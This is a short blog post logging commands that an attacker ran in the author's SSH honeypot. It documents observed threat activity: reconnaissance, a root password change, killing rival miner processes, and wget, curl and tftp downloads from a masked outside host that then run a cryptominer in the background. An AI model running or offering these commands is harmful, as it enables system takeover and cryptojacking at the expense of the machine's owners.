jacks-reid.xyz

SSH Honeypot

You’ve got a real problem if random folks are SSHing into your machines. However it’s still fun to see what they do once they get in. Here are example commands all from the same connection that I see in my SSH honeypots.

This list isn’t updated daily. Commands are often repeated and difficult to parse. I’ll try to upload interesting attackers when I see them.

‘Bad Dog’ Attacker

Cryptojacking with a call-out to a US President.

  • uname -a
  • cat /etc/passwd
  • cat /proc/cpuinfo | grep processor | wc -l
  • echo -e “ubnt2 nonsensepassword nonsensepassword” | passwd
  • kill -9 $(ps aux | grep xrx | awk ‘{print $2}’);kill -9 $(ps aux | grep biden1 | awk ‘{print $2}’);kill -9 $(ps aux | grep biden1 | awk ‘{print $2}’);kill -9 $(ps aux | grep zzh | awk ‘{print $2}’);kill -9 $(ps aux | grep arx645 | awk ‘{print $2}’);kill -9 $(ps aux | grep kthread | awk ‘{print $2}’);kill -9 $(ps aux | grep kthread | awk ‘{print $2}’)
  • cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf kthreads;wget -q http://107.x.x.x/x86_64/watchdogg || curl -s -o watchdogg 107.x.x.x/x86_64/watchdogg;chmod 777 watchdogg;chmod +x watchdogg;nohup ./watchdogg -o crypto.mining.pool:80 -u yikestheuserwashere -p Weak(lol) -k –cpu-max-threads-hint=75 –tls –tls-fingerprint=nope –huge-pages-jit –asm=auto –http-host=127.x.x.x –http-port=0 –http-access-token=null –api-id=null –api-worker-id=null –randomx-init=-1 –background </dev/null >/dev/null 2>&1 &
  • cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf kthread*;rm -rf kthread; rm -rf watchdog;rm -rf watchdog*;wget -q http://107.x.x.x/x86_64/watchdog || curl -s -o watchdog 107.x.x.x/x86_64/watchdog || tftp 107.x.x.x -c get /x86_64/watchdog || tftp -r /x86_64/watchdog -g 107.x.x.x || ftpget -v -u anonymous -p anonymous -P 21 107.x.x.x -c get /x86_64/watchdog;chmod 777 watchdog;chmod +x watchdog;nohup ./watchdog </dev/null >/dev/null 2>&1 &
  • cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf watchdogs*; wget http://107.x.x.x/x86_64/watchdogs; chmod 777 watchdogs; nohup ./watchdogs ssh stat2 kthread watchdog </dev/null >/dev/null 2>&1 &